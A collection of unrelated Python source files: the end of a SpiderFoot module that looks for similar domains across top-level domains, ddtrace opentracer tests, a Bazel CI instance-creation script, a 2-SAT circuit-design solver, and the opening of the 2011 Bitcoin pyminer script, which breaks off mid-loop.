tn = 'thread_sfp_tldsearch_' + str(random.SystemRandom().randint(0, 999999999))
t.append(threading.Thread(name=tn, target=self.tryTld, args=(domain, tld,)))
t[i].start()
# Block until all threads are finished
while running:
found = False
for rt in threading.enumerate():
if rt.name.startswith("thread_sfp_tldsearch_"):
found = True
if not found:
running = False
time.sleep(0.1)
for res in self.tldResults:
if self.tldResults[res] and res not in self.results:
self.sendEvent(sourceEvent, res)
# Store the result internally and notify listening modules
def sendEvent(self, source, result):
self.info("Found a TLD with the target's name: " + result)
self.results[result] = True
# Inform listening modules
if self.opts['activeonly']:
if self.checkForStop():
return
pageContent = self.sf.fetchUrl('http://' + result,
timeout=self.opts['_fetchtimeout'],
useragent=self.opts['_useragent'],
noLog=True,
verify=False)
if pageContent['content'] is not None:
evt = SpiderFootEvent("SIMILARDOMAIN", result, self.__name__, source)
self.notifyListeners(evt)
else:
evt = SpiderFootEvent("SIMILARDOMAIN", result, self.__name__, source)
self.notifyListeners(evt)
# Search for similar sounding domains
def handleEvent(self, event):
eventData = event.data
if eventData in self.results:
return
self.results[eventData] = True
keyword = self.sf.domainKeyword(eventData, self.opts['_internettlds'])
if not keyword:
self.error(f"Failed to extract keyword from {eventData}")
return
self.debug(f"Keyword extracted from {eventData}: {keyword}")
if keyword in self.results:
return
self.results[keyword] = True
# Look through all TLDs for the existence of this target keyword
targetList = list()
for tld in self.opts['_internettlds']:
if type(tld) != str:
tld = str(tld.strip(), errors='ignore')
else:
tld = tld.strip()
if tld.startswith("//") or len(tld) == 0:
continue
if tld.startswith("!") or tld.startswith("*") or tld.startswith(".."):
continue
if tld.endswith(".arpa"):
continue
tryDomain = keyword + "." + tld
if self.checkForStop():
return
if len(targetList) <= self.opts['_maxthreads']:
targetList.append([tryDomain, tld])
else:
self.tryTldWrapper(targetList, event)
targetList = list()
# Scan whatever may be left over.
if len(targetList) > 0:
self.tryTldWrapper(targetList, event)
# End of sfp_tldsearch class
|
test_tracer.py
|
import time
import mock
import opentracing
from opentracing import Format
from opentracing import InvalidCarrierException
from opentracing import SpanContextCorruptedException
from opentracing import UnsupportedFormatException
from opentracing import child_of
import pytest
import ddtrace
from ddtrace.ext.priority import AUTO_KEEP
from ddtrace.opentracer import Tracer
from ddtrace.opentracer import set_global_tracer
from ddtrace.opentracer.span_context import SpanContext
from ddtrace.propagation.http import HTTP_HEADER_TRACE_ID
from ddtrace.settings import ConfigException
class TestTracerConfig(object):
def test_config(self):
"""Test the configuration of the tracer"""
config = {"enabled": True}
tracer = Tracer(service_name="myservice", config=config)
assert tracer._service_name == "myservice"
assert tracer._enabled is True
def test_no_service_name(self):
"""A service_name should be generated if one is not provided."""
tracer = Tracer()
assert tracer._service_name == "pytest"
def test_multiple_tracer_configs(self):
"""Ensure that a tracer config is a copy of the passed config."""
config = {"enabled": True}
tracer1 = Tracer(service_name="serv1", config=config)
assert tracer1._service_name == "serv1"
config["enabled"] = False
tracer2 = Tracer(service_name="serv2", config=config)
# Ensure tracer1's config was not mutated
assert tracer1._service_name == "serv1"
assert tracer1._enabled is True
assert tracer2._service_name == "serv2"
assert tracer2._enabled is False
def test_invalid_config_key(self):
"""A config with an invalid key should raise a ConfigException."""
config = {"enabeld": False}
# No debug flag should not raise an error
tracer = Tracer(service_name="mysvc", config=config)
# With debug flag should raise an error
config["debug"] = True
with pytest.raises(ConfigException) as ce_info:
tracer = Tracer(config=config)
assert "enabeld" in str(ce_info)
assert tracer is not None
# Test with multiple incorrect keys
config["setttings"] = {}
with pytest.raises(ConfigException) as ce_info:
tracer = Tracer(service_name="mysvc", config=config)
assert ["enabeld", "setttings"] in str(ce_info)
assert tracer is not None
def test_global_tags(self):
"""Global tags should be passed from the opentracer to the tracer."""
config = {
"global_tags": {
"tag1": "value1",
"tag2": 2,
},
}
tracer = Tracer(service_name="mysvc", config=config)
with tracer.start_span("myop") as span:
# global tags should be attached to generated all datadog spans
assert span._dd_span.get_tag("tag1") == "value1"
assert span._dd_span.get_metric("tag2") == 2
with tracer.start_span("myop2") as span2:
assert span2._dd_span.get_tag("tag1") == "value1"
assert span2._dd_span.get_metric("tag2") == 2
class TestTracer(object):
def test_start_span(self, ot_tracer, test_spans):
"""Start and finish a span."""
with ot_tracer.start_span("myop") as span:
pass
# span should be finished when the context manager exits
assert span.finished
spans = test_spans.get_spans()
assert len(spans) == 1
def test_start_span_references(self, ot_tracer, test_spans):
"""Start a span using references."""
with ot_tracer.start_span("one", references=[child_of()]):
pass
spans = test_spans.pop()
assert spans[0].parent_id is None
root = ot_tracer.start_active_span("root")
# create a child using a parent reference that is not the context parent
with ot_tracer.start_active_span("one"):
with ot_tracer.start_active_span("two", references=[child_of(root.span)]):
pass
root.close()
spans = test_spans.pop()
assert spans[2].parent_id is spans[0].span_id
def test_start_span_custom_start_time(self, ot_tracer):
"""Start a span with a custom start time."""
t = 100
with mock.patch("ddtrace.span.time_ns") as time:
time.return_value = 102 * 1e9
with ot_tracer.start_span("myop", start_time=t) as span:
pass
assert span._dd_span.start == t
assert span._dd_span.duration == 2
def test_start_span_with_spancontext(self, ot_tracer, test_spans):
"""Start and finish a span using a span context as the child_of
reference.
"""
with ot_tracer.start_span("myop") as span:
with ot_tracer.start_span("myop", child_of=span.context) as span2:
pass
# span should be finished when the context manager exits
assert span.finished
assert span2.finished
spans = test_spans.pop()
assert len(spans) == 2
# ensure proper parenting
assert spans[1].parent_id is spans[0].span_id
def test_start_span_with_tags(self, ot_tracer):
"""Create a span with initial tags."""
tags = {"key": "value", "key2": "value2"}
with ot_tracer.start_span("myop", tags=tags) as span:
pass
assert span._dd_span.get_tag("key") == "value"
assert span._dd_span.get_tag("key2") == "value2"
def test_start_span_with_resource_name_tag(self, ot_tracer):
"""Create a span with the tag to set the resource name"""
tags = {"resource.name": "value", "key2": "value2"}
with ot_tracer.start_span("myop", tags=tags) as span:
pass
# Span resource name should be set to tag value, and should not get set as
# a tag on the underlying span.
assert span._dd_span.resource == "value"
assert span._dd_span.get_tag("resource.name") is None
# Other tags are set as normal
assert span._dd_span.get_tag("key2") == "value2"
def test_start_active_span_multi_child(self, ot_tracer, test_spans):
"""Start and finish multiple child spans.
This should ensure that child spans can be created 2 levels deep.
"""
with ot_tracer.start_active_span("myfirstop") as scope1:
time.sleep(0.009)
with ot_tracer.start_active_span("mysecondop") as scope2:
time.sleep(0.007)
with ot_tracer.start_active_span("mythirdop") as scope3:
time.sleep(0.005)
# spans should be finished when the context manager exits
assert scope1.span.finished
assert scope2.span.finished
assert scope3.span.finished
spans = test_spans.pop()
# check spans are captured in the trace
assert scope1.span._dd_span is spans[0]
assert scope2.span._dd_span is spans[1]
assert scope3.span._dd_span is spans[2]
# ensure proper parenting
assert spans[1].parent_id is spans[0].span_id
assert spans[2].parent_id is spans[1].span_id
# sanity check a lower bound on the durations
assert spans[0].duration >= 0.009 + 0.007 + 0.005
assert spans[1].duration >= 0.007 + 0.005
assert spans[2].duration >= 0.005
def test_start_active_span_multi_child_siblings(self, ot_tracer, test_spans):
"""Start and finish multiple span at the same level.
This should test to ensure a parent can have multiple child spans at the
same level.
"""
with ot_tracer.start_active_span("myfirstop") as scope1:
time.sleep(0.009)
with ot_tracer.start_active_span("mysecondop") as scope2:
time.sleep(0.007)
with ot_tracer.start_active_span("mythirdop") as scope3:
time.sleep(0.005)
# spans should be finished when the context manager exits
assert scope1.span.finished
assert scope2.span.finished
assert scope3.span.finished
spans = test_spans.pop()
# check spans are captured in the trace
assert scope1.span._dd_span is spans[0]
assert scope2.span._dd_span is spans[1]
assert scope3.span._dd_span is spans[2]
# ensure proper parenting
assert spans[1].parent_id is spans[0].span_id
assert spans[2].parent_id is spans[0].span_id
# sanity check a lower bound on the durations
assert spans[0].duration >= 0.009 + 0.007 + 0.005
assert spans[1].duration >= 0.007
assert spans[2].duration >= 0.005
def test_start_span_manual_child_of(self, ot_tracer, test_spans):
"""Start spans without using a scope manager.
Spans should be created without parents since there will be no call
for the active span.
"""
root = ot_tracer.start_span("zero")
with ot_tracer.start_span("one", child_of=root):
with ot_tracer.start_span("two", child_of=root):
with ot_tracer.start_span("three", child_of=root):
pass
root.finish()
spans = test_spans.pop()
assert spans[0].parent_id is None
# ensure each child span is a child of root
assert spans[1].parent_id is root._dd_span.span_id
assert spans[2].parent_id is root._dd_span.span_id
assert spans[3].parent_id is root._dd_span.span_id
assert spans[0].trace_id == spans[1].trace_id and spans[1].trace_id == spans[2].trace_id
def test_start_span_no_active_span(self, ot_tracer, test_spans):
"""Start spans without using a scope manager.
Spans should be created without parents since there will be no call
for the active span.
"""
with ot_tracer.start_span("one", ignore_active_span=True):
with ot_tracer.start_span("two", ignore_active_span=True):
pass
with ot_tracer.start_span("three", ignore_active_span=True):
pass
spans = test_spans.pop()
# ensure each span does not have a parent
assert spans[0].parent_id is None
assert spans[1].parent_id is None
assert spans[2].parent_id is None
# and that each span is a new trace
assert (
spans[0].trace_id != spans[1].trace_id
and spans[1].trace_id != spans[2].trace_id
and spans[0].trace_id != spans[2].trace_id
)
def test_start_active_span_child_finish_after_parent(self, ot_tracer, test_spans):
"""Start a child span and finish it after its parent."""
span1 = ot_tracer.start_active_span("one").span
span2 = ot_tracer.start_active_span("two").span
span1.finish()
time.sleep(0.005)
span2.finish()
spans = test_spans.pop()
assert len(spans) == 2
assert spans[0].parent_id is None
assert spans[1].parent_id is span1._dd_span.span_id
assert spans[1].duration > spans[0].duration
def test_start_span_multi_intertwined(self, ot_tracer, test_spans):
"""Start multiple spans at the top level intertwined.
Alternate calling between two traces.
"""
import threading
# synchronize threads with a threading event object
event = threading.Event()
def trace_one():
_id = 11
with ot_tracer.start_active_span(str(_id)):
_id += 1
with ot_tracer.start_active_span(str(_id)):
_id += 1
with ot_tracer.start_active_span(str(_id)):
pass
event.set()
def trace_two():
_id = 21
event.wait()
with ot_tracer.start_active_span(str(_id)):
_id += 1
with ot_tracer.start_active_span(str(_id)):
_id += 1
with ot_tracer.start_active_span(str(_id)):
pass
# the ordering should be
# t1.span1/t2.span1, t2.span2, t1.span2, t1.span3, t2.span3
t1 = threading.Thread(target=trace_one)
t2 = threading.Thread(target=trace_two)
t1.start()
t2.start()
# wait for threads to finish
t1.join()
t2.join()
spans = test_spans.pop()
# trace_one will finish before trace_two so its spans should be written
# before the spans from trace_two, let's confirm this
assert spans[0].name == "11"
assert spans[1].name == "12"
assert spans[2].name == "13"
assert spans[3].name == "21"
assert spans[4].name == "22"
assert spans[5].name == "23"
# next let's ensure that each span has the correct parent:
# trace_one
assert spans[0].parent_id is None
assert spans[1].parent_id is spans[0].span_id
assert spans[2].parent_id is spans[1].span_id
# trace_two
assert spans[3].parent_id is None
assert spans[4].parent_id is spans[3].span_id
assert spans[5].parent_id is spans[3].span_id
# finally we should ensure that the trace_ids are reasonable
# trace_one
assert spans[0].trace_id == spans[1].trace_id and spans[1].trace_id == spans[2].trace_id
# traces should be independent
assert spans[2].trace_id != spans[3].trace_id
# trace_two
assert spans[3].trace_id == spans[4].trace_id and spans[4].trace_id == spans[5].trace_id
def test_start_active_span(self, ot_tracer, test_spans):
with ot_tracer.start_active_span("one") as scope:
pass
assert scope.span._dd_span.name == "one"
assert scope.span.finished
spans = test_spans.pop()
assert spans
def test_start_active_span_finish_on_close(self, ot_tracer, test_spans):
with ot_tracer.start_active_span("one", finish_on_close=False) as scope:
pass
assert scope.span._dd_span.name == "one"
assert not scope.span.finished
spans = test_spans.pop()
assert not spans
def test_start_active_span_nested(self, ot_tracer):
"""Test the active span of multiple nested calls of start_active_span."""
with ot_tracer.start_active_span("one") as outer_scope:
assert ot_tracer.active_span == outer_scope.span
with ot_tracer.start_active_span("two") as inner_scope:
assert ot_tracer.active_span == inner_scope.span
with ot_tracer.start_active_span("three") as innest_scope: # why isn't it innest? innermost so verbose
assert ot_tracer.active_span == innest_scope.span
with ot_tracer.start_active_span("two") as inner_scope:
assert ot_tracer.active_span == inner_scope.span
assert ot_tracer.active_span == outer_scope.span
assert ot_tracer.active_span is None
def test_start_active_span_trace(self, ot_tracer, test_spans):
"""Test the active span of multiple nested calls of start_active_span."""
with ot_tracer.start_active_span("one") as outer_scope:
outer_scope.span.set_tag("outer", 2)
with ot_tracer.start_active_span("two") as inner_scope:
inner_scope.span.set_tag("inner", 3)
with ot_tracer.start_active_span("two") as inner_scope:
inner_scope.span.set_tag("inner", 3)
with ot_tracer.start_active_span("three") as innest_scope:
innest_scope.span.set_tag("innerest", 4)
spans = test_spans.pop()
assert spans[0].parent_id is None
assert spans[1].parent_id is spans[0].span_id
assert spans[2].parent_id is spans[0].span_id
assert spans[3].parent_id is spans[2].span_id
def test_interleave(self, ot_tracer, test_spans):
with ot_tracer.start_active_span("ot_root_1", ignore_active_span=True):
with ddtrace.tracer.trace("dd_child"):
with ot_tracer.start_active_span("ot_child_1"):
pass
with ot_tracer.start_active_span("ot_child_2"):
pass
spans = test_spans.pop()
assert len(spans) == 4
assert spans[0].name == "ot_root_1" and spans[0].parent_id is None
assert spans[1].name == "dd_child" and spans[1].parent_id == spans[0].span_id
assert spans[2].name == "ot_child_1" and spans[2].parent_id == spans[1].span_id
assert spans[3].name == "ot_child_2" and spans[3].parent_id == spans[0].span_id
def test_active_span(self, ot_tracer, test_spans):
with ot_tracer._dd_tracer.trace("dd") as span:
assert ot_tracer.active_span is not None
assert ot_tracer.active_span._dd_span is span
@pytest.fixture
def nop_span_ctx():
return SpanContext(sampling_priority=AUTO_KEEP)
class TestTracerSpanContextPropagation(object):
"""Test the injection and extration of a span context from a tracer."""
def test_invalid_format(self, ot_tracer, nop_span_ctx):
"""An invalid format should raise an UnsupportedFormatException."""
# test inject
with pytest.raises(UnsupportedFormatException):
ot_tracer.inject(nop_span_ctx, None, {})
# test extract
with pytest.raises(UnsupportedFormatException):
ot_tracer.extract(None, {})
def test_inject_invalid_carrier(self, ot_tracer, nop_span_ctx):
"""Only dicts should be supported as a carrier."""
with pytest.raises(InvalidCarrierException):
ot_tracer.inject(nop_span_ctx, Format.HTTP_HEADERS, None)
def test_extract_invalid_carrier(self, ot_tracer):
"""Only dicts should be supported as a carrier."""
with pytest.raises(InvalidCarrierException):
ot_tracer.extract(Format.HTTP_HEADERS, None)
def test_http_headers_base(self, ot_tracer):
"""extract should undo inject for http headers."""
span_ctx = SpanContext(trace_id=123, span_id=456)
carrier = {}
ot_tracer.inject(span_ctx, Format.HTTP_HEADERS, carrier)
assert len(carrier.keys()) > 0
ext_span_ctx = ot_tracer.extract(Format.HTTP_HEADERS, carrier)
assert ext_span_ctx._dd_context.trace_id == 123
assert ext_span_ctx._dd_context.span_id == 456
def test_http_headers_baggage(self, ot_tracer):
"""extract should undo inject for http headers."""
span_ctx = SpanContext(trace_id=123, span_id=456, baggage={"test": 4, "test2": "string"})
carrier = {}
ot_tracer.inject(span_ctx, Format.HTTP_HEADERS, carrier)
assert len(carrier.keys()) > 0
ext_span_ctx = ot_tracer.extract(Format.HTTP_HEADERS, carrier)
assert ext_span_ctx._dd_context.trace_id == 123
assert ext_span_ctx._dd_context.span_id == 456
assert ext_span_ctx.baggage == span_ctx.baggage
def test_empty_propagated_context(self, ot_tracer):
"""An empty propagated context should raise a
SpanContextCorruptedException when extracted.
"""
carrier = {}
with pytest.raises(SpanContextCorruptedException):
ot_tracer.extract(Format.HTTP_HEADERS, carrier)
def test_text(self, ot_tracer):
"""extract should undo inject for http headers"""
span_ctx = SpanContext(trace_id=123, span_id=456, baggage={"test": 4, "test2": "string"})
carrier = {}
ot_tracer.inject(span_ctx, Format.TEXT_MAP, carrier)
assert len(carrier.keys()) > 0
ext_span_ctx = ot_tracer.extract(Format.TEXT_MAP, carrier)
assert ext_span_ctx._dd_context.trace_id == 123
assert ext_span_ctx._dd_context.span_id == 456
assert ext_span_ctx.baggage == span_ctx.baggage
def test_corrupted_propagated_context(self, ot_tracer):
"""Corrupted context should raise a SpanContextCorruptedException."""
span_ctx = SpanContext(trace_id=123, span_id=456, baggage={"test": 4, "test2": "string"})
carrier = {}
ot_tracer.inject(span_ctx, Format.TEXT_MAP, carrier)
assert len(carrier.keys()) > 0
# manually alter a key in the carrier baggage
del carrier[HTTP_HEADER_TRACE_ID]
corrupted_key = HTTP_HEADER_TRACE_ID[2:]
carrier[corrupted_key] = 123
with pytest.raises(SpanContextCorruptedException):
ot_tracer.extract(Format.TEXT_MAP, carrier)
def test_immutable_span_context(self, ot_tracer):
"""Span contexts should be immutable."""
with ot_tracer.start_span("root") as root:
ctx_before = root.context
root.set_baggage_item("test", 2)
assert ctx_before is not root.context
with ot_tracer.start_span("child") as level1:
with ot_tracer.start_span("child") as level2:
pass
assert root.context is not level1.context
assert level2.context is not level1.context
assert level2.context is not root.context
def test_inherited_baggage(self, ot_tracer):
"""Baggage should be inherited by child spans."""
with ot_tracer.start_active_span("root") as root:
# this should be passed down to the child
root.span.set_baggage_item("root", 1)
root.span.set_baggage_item("root2", 1)
with ot_tracer.start_active_span("child") as level1:
level1.span.set_baggage_item("level1", 1)
with ot_tracer.start_active_span("child") as level2:
level2.span.set_baggage_item("level2", 1)
# ensure immutability
assert level1.span.context is not root.span.context
assert level2.span.context is not level1.span.context
# level1 should have inherited the baggage of root
assert level1.span.get_baggage_item("root")
assert level1.span.get_baggage_item("root2")
# level2 should have inherited the baggage of both level1 and level2
assert level2.span.get_baggage_item("root")
assert level2.span.get_baggage_item("root2")
assert level2.span.get_baggage_item("level1")
assert level2.span.get_baggage_item("level2")
class TestTracerCompatibility(object):
"""Ensure that our opentracer produces results in the underlying datadog tracer."""
def test_required_dd_fields(self):
"""Ensure required fields needed for successful tracing are possessed
by the underlying datadog tracer.
"""
# a service name is required
tracer = Tracer("service")
with tracer.start_span("my_span") as span:
assert span._dd_span.service
def test_set_global_tracer():
"""Sanity check for set_global_tracer"""
my_tracer = Tracer("service")
set_global_tracer(my_tracer)
assert opentracing.tracer is my_tracer
assert ddtrace.tracer is my_tracer._dd_tracer
|
create_instances.py
|
#!/usr/bin/env python3
#
# Copyright 2018 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
from datetime import datetime
import os
import queue
import sys
import threading
import yaml
import gcloud
WORK_QUEUE = queue.Queue()
def worker():
while True:
item = WORK_QUEUE.get()
if not item:
break
try:
# We take a few keys out of the config item. The rest is passed
# as-is to create_instance_template() and thus to the gcloud
# command line tool.
count = item.pop("count")
instance_group_name = item.pop("name")
project = item.pop("project")
zone = item.pop("zone", None)
region = item.pop("region", None)
health_check = item.pop("health_check", None)
initial_delay = item.pop("initial_delay", None)
if not project:
raise Exception("Invalid instance config, no project name set")
if not zone and not region:
raise Exception("Invalid instance config, either zone or region must be specified")
timestamp = datetime.now().strftime("%Y%m%dt%H%M%S")
template_name = "{}-{}".format(instance_group_name, timestamp)
if zone is not None:
if (
gcloud.delete_instance_group(
instance_group_name, project=project, zone=zone
).returncode
== 0
):
print("Deleted existing instance group: {}".format(instance_group_name))
elif region is not None:
if (
gcloud.delete_instance_group(
instance_group_name, project=project, region=region
).returncode
== 0
):
print("Deleted existing instance group: {}".format(instance_group_name))
# Create the new instance template.
gcloud.create_instance_template(template_name, project=project, **item)
print("Created instance template {}".format(template_name))
# Create instance groups with the new template.
kwargs = {
"project": project,
"base_instance_name": instance_group_name,
"size": count,
"template": template_name,
}
if zone:
kwargs["zone"] = zone
elif region:
kwargs["region"] = region
if health_check:
kwargs["health_check"] = health_check
if initial_delay:
kwargs["initial_delay"] = initial_delay
gcloud.create_instance_group(instance_group_name, **kwargs)
print("Created instance group {}".format(instance_group_name))
finally:
WORK_QUEUE.task_done()
def read_config_file():
path = os.path.join(os.getcwd(), "instances.yml")
with open(path, "rb") as fd:
content = fd.read().decode("utf-8")
return yaml.safe_load(content)
def main(argv=None):
if argv is None:
argv = sys.argv[1:]
parser = argparse.ArgumentParser(description="Bazel CI Instance Creation")
parser.add_argument(
"names",
type=str,
nargs="*",
help="List of instance (group) names that should be created. "
'These values must correspond to "name" entries in the '
'Yaml configuration, e.g. "bk-pipeline-ubuntu1804-java8".',
)
args = parser.parse_args(argv)
config = read_config_file()
# Verify names passed on the command-line.
valid_names = [item["name"] for item in config["instance_groups"]]
for name in args.names:
if name not in valid_names:
print("Unknown instance name: {}!".format(name))
print("\nValid instance names are: {}".format(" ".join(valid_names)))
return 1
if not args.names:
parser.print_help()
print("\nValid instance names are: {}".format(" ".join(valid_names)))
return 1
# Put VM creation instructions into the work queue.
for instance in config["instance_groups"]:
if instance["name"] not in args.names:
continue
WORK_QUEUE.put({**config["default_vm"], **instance})
# Spawn worker threads that will create the VMs.
threads = []
for _ in range(WORK_QUEUE.qsize()):
t = threading.Thread(target=worker)
t.start()
threads.append(t)
# Wait for all VMs to be created.
WORK_QUEUE.join()
# Signal worker threads to exit.
for _ in range(len(threads)):
WORK_QUEUE.put(None)
# Wait for worker threads to exit.
for t in threads:
t.join()
return 0
if __name__ == "__main__":
sys.exit(main())
|
circuit_design.py
|
#Uses python3
import sys
import threading
sys.setrecursionlimit(10 ** 7) # max depth of recursion
threading.stack_size(2 ** 27) # new thread will get stack of such size
class Dgraph:
"""
A class to represent a directed graph.
...
Attributes
----------
num_v : int()
Number of vertices
neg_v : int()
Negative vertex range
adj_list : dict()
Vertices and their neighbors
t_sort : list()
Vertices sorted in descending order according to their post value (topological sort)
g_rev : dict()
Graph with its edges reversed
prev : dict()
Vertex and value assigned at the beginning of the exploration
post : dict()
Vertex and value assigned at the end of the exploration
visited : dict()
Visited vertices
component : dict()
Vertex and the component to which it belongs
component_2 : dict()
Component and list of vertices that belong to it
clock : 1
Value that is assigned to each vertex in previsit and postvisit,
increases by one after each assignment
Methods
-------
previsit(self, vertex):
Assigns each vertex the current value of the clock when the exploration starts.
postvisit(self, vertex):
Assigns each vertex the current value of the clock when the exploration ends.
explore_rev(self, vertex):
Traverse each neighbor of the given vertex, reverse the edges of the graph,
and order the vertices according to their post value (topological sort).
dfs_rev(self):
Traverse each vertex of the graph.
explore(self, vertex, id_c):
Traverse each neighbor of a given vertex.
strongly_connected_components(self):
Find the strongly connected components in the graph.
two_sat(self):
Determine if a 2-CNF formula is satisfiable by examining some possible values for its variables.
"""
def __init__(self, adj_l, num):
"""
Constructs all the necessary attributes for a directed graph:
Parameters
----------
num_v : int()
Number of vertices
neg_v : int()
Negative vertex range
adj_list : dict()
Vertices and their neighbors
t_sort : list()
Vertices sorted in descending order according to their post value (topological sort)
g_rev : dict()
Graph with its edges reversed
prev : dict()
Vertex and value assigned at the beginning of the exploration
post : dict()
Vertex and value assigned at the end of the exploration
visited : dict()
Visited vertices
component : dict()
Vertex and the component to which it belongs
component_2 : dict()
Component and list of vertices that belong to it
clock : 1
Value that is assigned to each vertex in previsit and postvisit,
increases by one after each assignment
"""
self.num_v = num
self.neg_v = num * -1
self.adj_list = adj_l
self.t_sort = list()
self.g_rev = {i : list() for i in range(self.neg_v, self.num_v + 1) if i != 0}
self.prev = dict()
self.post = dict()
self.visited = dict()
self.component = dict()
self.component_2 = dict()
self.clock = 1
def previsit(self, vertex):
'''Assigns each vertex the current value of the clock when the exploration starts
and increases the clock value by one.'''
self.prev[vertex] = self.clock
self.clock += 1
def postvisit(self, vertex):
'''Assigns each vertex the current value of the clock when the exploration ends
and increases the clock value by one.'''
self.post[vertex] = self.clock
self.clock += 1
def explore_rev(self, vertex):
'''Traverse each neighbor of the given vertex, reverse the edges of the graph,
and order the vertices according to their post value.'''
self.visited[vertex] = 'visited'
self.previsit(vertex)
for neighbor in self.adj_list.get(vertex):
self.g_rev[neighbor].append(vertex)
if neighbor not in self.visited:
self.explore_rev(neighbor)
self.postvisit(vertex)
if len(self.t_sort) == 0:
self.t_sort.append(vertex)
else:
for i in range(len(self.t_sort)):
pre_vertex = self.t_sort[i]
if self.post[pre_vertex] < self.post[vertex]:
self.t_sort.insert(i, vertex)
break
def dfs_rev(self):
'''Traverse each vertex of the graph.'''
vertices = [i for i in range(self.neg_v, self.num_v + 1) if i != 0]
for vertex in vertices:
if vertex not in self.visited:
self.explore_rev(vertex)
self.visited.clear()
def explore(self, vertex, id_c):
'''Given a vertex and the id of a component, explore the neighbors
of the vertex and establish which component they belong to.'''
self.visited[vertex] = 'visited'
self.component[vertex] = id_c
if id_c not in self.component_2: # component and its list of vertices
self.component_2[id_c] = list()
self.component_2[id_c].append(vertex)
else:
self.component_2[id_c].append(vertex)
for neighbor in self.g_rev.get(vertex):
if neighbor not in self.visited:
self.explore(neighbor, id_c)
def strongly_connected_components(self):
'''Find the strongly connected components in the graph.'''
self.dfs_rev() # First you have to reverse the graph
id_comp = 1
# We go through the reverted graph in the order indicated by t_sort
for vertex in self.t_sort: # vertex = index in the list
if vertex not in self.visited:
self.explore(vertex, id_comp)
# if we cannot go through the entire graph in one call, it has more than one component
id_comp += 1
result = self.two_sat()
if result is False:
print("UNSATISFIABLE")
else:
print("SATISFIABLE")
print(*result)
def two_sat(self):
'''Determine if a 2-CNF formula is satisfiable by
examining some possible values for its variables.'''
assigned_vars = dict()
# If the variable is positive its value is 1,
# if it is its negative counterpart its value is 0
com_visited = dict()
for var_x in range(1, self.num_v + 1):
# if the variable and its counterpart are in the same strongly connected component
if self.component.get(var_x) == self.component.get(var_x * -1):
return False
self.t_sort = self.t_sort[::-1] # reversed topological sort
for cur_comp in self.t_sort:
com_id = self.component.get(cur_comp)
if com_id not in com_visited:
com_list = self.component_2.get(com_id)
com_visited[com_id] = 'visited'
for cur_var in com_list:
# if the variable and its counterpart do not have an assigned value
if cur_var not in assigned_vars and cur_var * -1 not in assigned_vars:
assigned_vars[cur_var] = 1 # we only assign value to the variable, not for its counterpart
result = list(assigned_vars.keys())
return sorted(result, key=abs) # sorted by its absolute value
def main():
graph = sys.stdin.read()
data = list(map(int, graph.split()))
n_var, n_cla = data[0:2]
data = data[2:]
edges = list(zip(data[0:(2 * n_cla):2], data[1:(2 * n_cla):2]))
neg = n_var * -1
adj = {i : list() for i in range(neg, n_var + 1) if i != 0} # list of vertices and their neighbors
for (a, b) in edges:
adj[a * -1].append(b)
adj[b * -1].append(a)
d_graph = Dgraph(adj, n_var)
d_graph.strongly_connected_components()
threading.Thread(target=main).start()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
